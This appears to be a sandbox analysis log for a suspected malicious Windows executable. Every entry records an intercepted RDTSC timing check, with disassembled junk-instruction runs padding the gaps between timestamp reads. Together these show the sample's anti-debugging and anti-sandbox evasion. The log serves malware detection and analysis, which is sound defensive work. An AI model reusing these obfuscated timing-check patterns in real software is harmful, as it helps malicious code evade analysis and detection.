Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F17D second address: 106F1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB19901BD06h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007FB19901BD0Ch 0x00000013 jnl 00007FB19901BD0Ah 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F1A3 second address: 106F1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BDDBh 0x00000009 jmp 00007FB19901BDE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F2F1 second address: 106F2F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F2F7 second address: 106F2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102184C second address: 10218B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FB19901BD06h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f and di, 6369h 0x00000014 mov ebx, dword ptr [ebp+124857D5h] 0x0000001a sub edx, 62F11C20h 0x00000020 add eax, ebx 0x00000022 and dl, FFFFFFF6h 0x00000025 push eax 0x00000026 jmp 00007FB19901BD10h 0x0000002b mov dword ptr [esp], eax 0x0000002e xor dword ptr [ebp+1244F41Ah], ebx 0x00000034 push 00000004h 0x00000036 mov dword ptr [ebp+12456A79h], edi 0x0000003c nop 0x0000003d jmp 00007FB19901BD0Dh 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FB19901BD12h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10218B6 second address: 10218BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F436 second address: 106F451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB19901BD14h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F451 second address: 106F455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F455 second address: 106F45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F45B second address: 106F464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE2AF2 second address: FE2B14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB19901BD16h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE2B14 second address: FE2B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDDDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE2B26 second address: FE2B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB19901BD06h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107290F second address: 1072913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1072A50 second address: 1072A68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB19901BD0Bh 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107B36C second address: 107B371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107B371 second address: 107B390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BD12h 0x00000008 jno 00007FB19901BD06h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107989B second address: 10798A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A0B5 second address: 107A0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A0B9 second address: 107A0CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FB19901BDD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A0CE second address: 107A0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A0D2 second address: 107A0D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A3CD second address: 107A40D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007FB19901BD19h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FB19901BD14h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A40D second address: 107A413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD45 second address: 107AD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD4B second address: 107AD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD4F second address: 107AD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD58 second address: 107AD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB19901BDD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD64 second address: 107AD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD69 second address: 107AD96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB19901BDE8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1083849 second address: 108384D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1082B20 second address: 1082B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB19901BDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1082C82 second address: 1082C99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1082DFD second address: 1082E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108A324 second address: 108A32D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108A32D second address: 108A337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108A337 second address: 108A340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108A711 second address: 108A715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108AA19 second address: 108AA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FB19901BD13h 0x0000000a pushad 0x0000000b jmp 00007FB19901BD14h 0x00000010 jp 00007FB19901BD06h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108AB81 second address: 108AB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB19901BDD6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108B2E6 second address: 108B2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108B2EA second address: 108B2FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108BA64 second address: 108BA8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FB19901BD06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB19901BD0Fh 0x00000015 jmp 00007FB19901BD0Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108BA8D second address: 108BAB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB19901BDE5h 0x0000000e je 00007FB19901BDD6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1089B5A second address: 1089B60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10925C9 second address: 10925D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1091FDB second address: 1091FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1092124 second address: 1092132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jg 00007FB19901BDD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 109F564 second address: 109F575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BD0Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 109F575 second address: 109F57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 109F57B second address: 109F57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD0355 second address: FD036D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 jns 00007FB19901BDD6h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FB19901BDD6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A2AE8 second address: 10A2AF4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB19901BD0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A2AF4 second address: 10A2AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A2C89 second address: 10A2C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A2C8D second address: 10A2C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A696D second address: 10A6971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A6971 second address: 10A697B instructions: 0x00000000 rdtsc 0x00000002 js 00007FB19901BDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A697B second address: 10A6981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10AB0C5 second address: 10AB0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDDDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10B3033 second address: 10B3037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10B3037 second address: 10B303D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10BF5CF second address: 10BF5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10BE44A second address: 10BE467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB19901BDDEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB19901BDD6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10BE89D second address: 10BE8A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FB19901BD06h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C1A07 second address: 10C1A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FB19901BDE2h 0x0000000d jne 00007FB19901BDEFh 0x00000013 jl 00007FB19901BDDCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C1A47 second address: 10C1A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C1A52 second address: 10C1A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C1A56 second address: 10C1A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C4886 second address: 10C4899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FB19901BDDEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10D5597 second address: 10D55C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Ah 0x00000007 push edx 0x00000008 jg 00007FB19901BD06h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop esi 0x00000017 jmp 00007FB19901BD10h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10D5421 second address: 10D5431 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB19901BDE2h 0x00000008 jl 00007FB19901BDD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10DA9FD second address: 10DAA4F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB19901BD19h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FB19901BD20h 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FB19901BD18h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB19901BD11h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10E66DA second address: 10E66E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10E8D3F second address: 10E8D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB19901BD17h 0x0000000a js 00007FB19901BD18h 0x00000010 jmp 00007FB19901BD12h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FB19901BD10h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10E8D89 second address: 10E8D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10ECFE6 second address: 10ED002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BD0Dh 0x00000009 jmp 00007FB19901BD0Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10ED002 second address: 10ED006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067D2 second address: 11067D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067D8 second address: 11067DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067DE second address: 11067E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067E5 second address: 11067EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067EA second address: 11067F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110696C second address: 110699F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FB19901BDDDh 0x0000000d jmp 00007FB19901BDDEh 0x00000012 jmp 00007FB19901BDDFh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A329 second address: 110A33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BD0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A3BB second address: 110A3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A3C1 second address: 110A3EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FB19901BD0Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A3EC second address: 110A3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDDFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A5B5 second address: 110A5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A949 second address: 110A950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110D421 second address: 110D427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110D427 second address: 110D42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110D42D second address: 110D450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BD12h 0x00000009 popad 0x0000000a jl 00007FB19901BD14h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D703DA second address: 4D703F8 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB19901BD13h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D703F8 second address: 4D703FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
